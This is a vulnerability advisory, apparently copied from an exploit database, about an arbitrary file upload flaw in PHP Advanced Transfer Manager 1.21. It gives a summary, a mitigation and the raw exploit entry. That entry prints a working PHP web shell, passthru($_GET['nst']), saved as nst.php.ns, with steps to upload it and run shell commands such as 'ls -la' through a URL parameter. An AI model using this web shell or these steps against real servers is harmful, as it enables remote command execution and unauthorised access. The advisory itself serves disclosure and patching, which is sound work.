PHP Advanced Transfer Manager Arbitrary File Upload Vulnerability

vendor:

PHP Advanced Transfer Manager

by:

SecurityFocus

7,5

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: PHP Advanced Transfer Manager

Affected Version From: 1.21

Affected Version To: 1.21

Patch Exists: YES

Related CWE: N/A

CPE: a:php_advanced_transfer_manager:php_advanced_transfer_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

PHP Advanced Transfer Manager Arbitrary File Upload Vulnerability

PHP Advanced Transfer Manager is prone to a vulnerability regarding the uploading of arbitrary files. If successfully exploited, an attacker can execute arbitrary script code on a vulnerable server. This can lead to unauthorized access in the context of the affected server. An attacker can create a file with a .ns extension, containing malicious code, and upload it to the vulnerable server. The attacker can then access the file and execute the malicious code.

Mitigation:

Upgrade to the latest version of PHP Advanced Transfer Manager.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13542/info

PHP Advanced Transfer Manager is prone to a vulnerability regarding the uploading of arbitrary files.

If successfully exploited, an attacker can execute arbitrary script code on a vulnerable server. This can lead to unauthorized access in the context of the affected server.

This issue reportedly affects PHP Advanced Transfer Manager version 1.21; earlier versions may also be vulnerable. 

Create file:
nst.php.ns

<pre>
<?
passthru($_GET['nst']);
?>

Then upload, and go to http://www.example.com/files/nst.php.ns?nst=ls -la

or

<?
passthru($_GET['nst']);
?>

Then upload, and go to http://example.com/files/nst.php.ns?nst=http://your/file.txt